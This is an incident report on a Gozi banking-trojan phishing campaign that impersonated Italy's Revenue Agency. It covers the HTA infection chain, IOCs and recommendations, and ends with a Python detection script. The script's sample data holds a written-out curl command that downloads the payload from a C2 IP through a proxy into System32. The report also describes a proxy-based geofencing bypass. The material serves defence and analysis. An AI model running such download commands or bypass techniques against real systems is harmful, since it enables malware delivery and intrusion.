Breakdown of a recent Gozi trojan Italian targeted campaign
# Incident Report: Gozi Botnet Campaign Targeting Italian Revenue Agency
## Executive Summary
A massive malspam campaign targeted individuals in Italy, impersonating the "Agenzia delle Entrate" (Italian Revenue Agency) to trick victims into downloading and executing malware, ultimately leading to the installation of the Gozi banking trojan. The attack used a heavily obfuscated, multi-stage execution chain that began with an HTA attachment and culminated in the download of a final payload from an attacker-controlled C2 server. The primary impact appears to be the compromise of user systems for banking fraud facilitated by the Gozi malware.
## Incident Details
- **Discovery Date:** Not explicitly stated, but implied to be recent based on the campaign description.
- **Incident Date:** Occurred during a recent campaign whose lure cited 2023 VAT documentation issues.
- **Affected Organization:** Individuals targeted by emails impersonating Agenzia delle Entrate (Italian Revenue Agency).
- **Sector:** Finance/Government Impersonation (targeting general populace).
- **Geography:** Italy.
## Timeline of Events
### Initial Access
- **Date/Time:** During the period of the malspam campaign.
- **Vector:** Malicious email attachment (Malspam).
- **Details:** Victims received emails impersonating Agenzia delle Entrate, citing VAT document inconsistencies, compelling users to open the attachment: `AgenziaEntrate.hta`.
### Lateral Movement
- Not detailed in the source material with respect to lateral movement *within* the network; however, the execution chain drops a secondary payload (`login.exe`) to `C:\Windows\System32\LogFiles\`, indicating persistence and command execution capability on the host.
### Data Exfiltration/Impact
- The ultimate goal, as implied by the deployment of the **Gozi botnet**, is likely credential harvesting, banking fraud, and further data exfiltration.
### Detection & Response
- **How it was discovered:** Analysis of the malware chain by a security researcher/analyst.
- **Response actions taken:** The analyst recovered IOCs, detailed the multi-stage infection process, and documented the geofencing bypass technique. No organizational response actions from the victim side are detailed.
## Attack Methodology
- **Initial Access:** Malicious `.hta` (HTML Application) attachment sent via email, leveraging social engineering regarding tax documents.
- **Persistence:** The VBS portion of the script downloaded and saved a secondary payload (`login.exe`) to `%systemroot%\System32\LogFiles\`.
- **Privilege Escalation:** Not explicitly detailed, but writing executables into system folders such as `System32\LogFiles` generally requires elevated privileges or an already-privileged user context.
- **Defense Evasion:**
* **Obfuscation:** Heavy use of string escaping, URL decoding, and `jscript.encode` to hide the malicious code within the HTA file.
* **Geofencing Bypass:** The C2 server (IP: 191.101.2.39) likely checked the request origin. The attacker bypassed this by using the `-x` flag with `curl` through an Italian HTTP proxy to receive the anticipated payload (`installazione.exe`).
- **Credential Access:** The final payload is the Gozi trojan, known primarily for capturing banking credentials.
- **Discovery:** Initial reconnaissance involved analyzing the obfuscated HTA script contents.
- **Lateral Movement:** Not detailed.
- **Collection:** The final Gozi binary collects sensitive information.
- **Exfiltration:** Not detailed beyond the final malware being the Gozi trojan.
- **Impact:** Installation of Gozi botnet to facilitate financial fraud.
## Impact Assessment
- **Financial:** Potential financial loss due to banking trojan activity (Gozi). Specific costs not available.
- **Data Breach:** High risk of credential compromise (banking details, etc.).
- **Operational:** Infection of individual user endpoints.
- **Reputational:** Negative impact on the perceived security of the Agenzia delle Entrate due to impersonation.
## Indicators of Compromise
- **Network Indicators (Defanged):**
* C2 IP: `191[.]101[.]2[.]39`
* C2 IP: `62[.]173[.]141[.]252`
* C2 IP: `31[.]41[.]44[.]33`
* C2 IP: `109[.]248[.]11[.]112`
- **File Indicators:**
* Staging file: `AgenziaEntrate.hta` (SHA256: a3cec099b936e9f486de3b1492a81e55b17d5c2b06223f4256d49afc7bd212bc)
* Payload download URL: `http://191[.]101[.]2[.]39/installazione.exe`
* Dropped path/name: `%systemroot%\System32\LogFiles\login.exe`
* Final payload modules: `shellcode1.bin`, `shellcode2.bin`, `gozi loader.bin`, `gozi binary.bin`
- **Behavioral Indicators:**
* Use of highly obfuscated scripts including URL encoding, unicode escaping, and JScript.Encode.
* Execution chain involving VBScript to launch `curl` from the HTA process.
* Use of Italian proxies to bypass geographical restrictions on the C2 server.
## Response Actions
- **Containment measures:** Not detailed as this is a post-incident analysis, but immediate actions would involve isolating affected hosts and blocking C2 communications.
- **Eradication steps:** Removal of the dropped executable (`login.exe`) and the initial HTA/script files. Full eradication requires a system wipe/reimage if the final Gozi binary achieved deep persistence.
- **Recovery actions:** Resetting credentials accessed via the compromised device.
## Lessons Learned
- **Key takeaways:** Sophisticated, multi-layered obfuscation (escaping, URL decoding, JScript encoding) continues to be highly effective in bypassing static analysis of initial artifacts like HTA files.
- **What could have been done better:** Victims failed to adhere to security protocols regarding opening unsolicited attachments, especially those purporting to be official government communications. Attackers actively test and bypass geographic geofencing mechanisms.
## Recommendations
- **Prevention measures for similar incidents:**
1. Implement stricter email gateway filtering to block `.hta` attachments, especially those containing script content.
2. Mandate strong credentials and MFA for all financial/government portals to mitigate credential theft by banking Trojans like Gozi.
3. Conduct user training focused specifically on social engineering tactics impersonating tax/revenue agencies.
4. Monitor outbound network traffic for unusual `curl` usage originating from user endpoints, particularly when utilizing proxy arguments (`-x`).
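The behavioral indicators above and recommendation 4 describe one process chain: an HTA opened by a script host, VBScript spawning `curl` with a `-x` proxy argument, and an executable written under `System32\LogFiles`. The following Python is an added example, not code from the report, that runs those checks over constructed Sysmon-style process-creation records; the parent image `mshta.exe`, the user profile path, and the proxy address are assumptions.

```python
import re
from typing import Dict, List

# Constructed Sysmon Event ID 1 (process creation) style records for illustration.
# The user path, proxy address and parent process are assumptions, not values from the report.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Users\mario\Downloads\AgenziaEntrate.hta"'},
    {"Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"curl.exe -x http://203.0.113.7:8080 http://191.101.2.39/installazione.exe "
                    r"-o C:\Windows\System32\LogFiles\login.exe"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"curl.exe -sS https://example.org/status"},
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# curl proxy switch: "-x <proxy>", "--proxy <proxy>" or "--proxy=<proxy>"
PROXY_ARG = re.compile(r"(?:^|\s)(?:-x|--proxy)(?:\s|=)", re.IGNORECASE)
# an .exe placed under %systemroot%\System32\LogFiles, the drop location from the report
DROP_PATH = re.compile(r"\\System32\\LogFiles\\[^\s\"]+\.exe", re.IGNORECASE)
# an .hta launched from a user profile directory (e.g. Downloads)
HTA_FROM_USER = re.compile(r"\\Users\\[^\\]+\\.*\.hta\b", re.IGNORECASE)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of every detection rule the event matches, in rule order."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event["CommandLine"]
    hits: List[str] = []
    if image == "mshta.exe" and HTA_FROM_USER.search(cmd):
        hits.append("mshta_runs_hta_from_user_profile")
    if image == "curl.exe" and parent in SCRIPT_HOSTS:
        hits.append("script_host_spawns_curl")
    if image == "curl.exe" and PROXY_ARG.search(cmd):
        hits.append("curl_with_proxy_argument")
    if DROP_PATH.search(cmd):
        hits.append("exe_written_to_system32_logfiles")
    return hits

def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map the index of each suspicious event to the rules it triggered."""
    findings: Dict[int, List[str]] = {}
    for i, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            findings[i] = hits
    return findings

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["Image"], rules)
```

The same rules translate directly to a SIEM query over Sysmon or EDR telemetry by matching the `Image`, `ParentImage` and `CommandLine` fields.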